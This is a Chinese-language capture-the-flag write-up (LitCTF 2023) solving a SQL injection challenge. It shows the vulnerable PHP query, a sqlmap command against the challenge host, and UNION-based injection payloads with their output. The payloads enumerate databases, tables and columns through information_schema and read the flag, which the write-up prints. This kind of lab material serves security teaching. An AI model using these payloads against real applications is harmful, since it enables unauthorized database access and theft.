LOADING

[LitCTF 2023]这是什么?SQL !注一下 !

网络安全

这是什么?SQL !注一下 !

一个输入框和提示
给出了Key Source

<?php
$sql = "SELECT username,password FROM users WHERE id = ".'(((((('.$_GET["id"].'))))))';
$result = $conn->query($sql);

sqlmap

python sqlmap.py -u "http://node5.anna.nssctf.cn:25805/?id=1" --dbs

详情见通过sqlmap拿下数据库.md

初步尝试

输入1试试看

# 回显:
Executed Operations:
SELECT username,password FROM users WHERE id = ((((((1))))))
Array ( 
[0] => Array ( 
    [username] => tanji 
    [password] => OHHHHHHH 
    ) 
)

有很多括号,构造id = 1)))))) or 1=1#
后台代码变成了

SELECT username,password FROM users WHERE id = ((((((1)))))) or 1=1#))))))
# 回显:
Executed Operations:
SELECT username,password FROM users WHERE id = ((((((1)))))) or 1=1#))))))
Array ( 
[0] => Array ( 
    [username] => tanji 
    [password] => OHHHHHHH 
    ) 
[1] => Array ( 
    [username] => fake_flag 
    [password] => F1rst_to_Th3_eggggggggg!} (4/4) 
    ) 
)

fake_flag,答案不在这里

获取数据库信息

# payload
id=1)))))) union select 1,group_concat(schema_name) from information_schema.schemata#
# 回显:
Array ( 
[0] => Array ( 
    [username] => tanji 
    [password] => OHHHHHHH 
    ) 
[1] => Array ( 
    [username] => 1 
    [password] => information_schema,mysql,ctftraining,performance_schema,test,ctf 
    ) 
)

数据库有:

  • information_schema
  • mysql
  • ctftraining
  • performance_schema
  • test
  • ctf

获取表名

一个个读取数据库的表名,flag在ctftraining数据库里,直接拿这个演示了

# payload
?id=1))))))union select 1,group_concat(table_name) from information_schema.tables where table_schema='ctftraining'#
# 回显:
Executed Operations:
SELECT username,password FROM users WHERE id = ((((((1))))))union select 1,group_concat(table_name) from information_schema.tables where table_schema='ctftraining'#))))))

Array ( 
[0] => Array ( 
    [username] => tanji 
    [password] => OHHHHHHH 
    ) 
[1] => Array ( 
    [username] => 1 
    [password] => flag,news,users 
    ) 
)

找到flag表了

获取字段

# payload
?id=1)))))) union select 1,group_concat(column_name) from information_schema.columns where table_schema='ctftraining'#
# 回显:
Executed Operations:
SELECT username,password FROM users WHERE id = ((((((1)))))) union select 1,group_concat(column_name) from information_schema.columns where table_schema='ctftraining'#))))))

Array ( 
[0] => Array ( 
    [username] => tanji 
    [password] => OHHHHHHH 
    ) 
[1] => Array ( 
    [username] => 1 
    [password] => flag,id,title,content,time,id,username,password,ip,time 
    ) 
)

找到flag字段了

获取flag

# payload
?id=1)))))) union select 1,flag from ctftraining.flag#
# 回显:
Executed Operations:
SELECT username,password FROM users WHERE id = ((((((1))))))union select 1,flag from ctftraining.flag#))))))

Array ( 
[0] => Array ( 
    [username] => tanji 
    [password] => OHHHHHHH 
    ) 
[1] => Array ( 
    [username] => 1 
    [password] => NSSCTF{26433a18-4388-4bd5-865f-d09f2a2443e4} 
    ) 
)

flag:NSSCTF{26433a18-4388-4bd5-865f-d09f2a2443e4}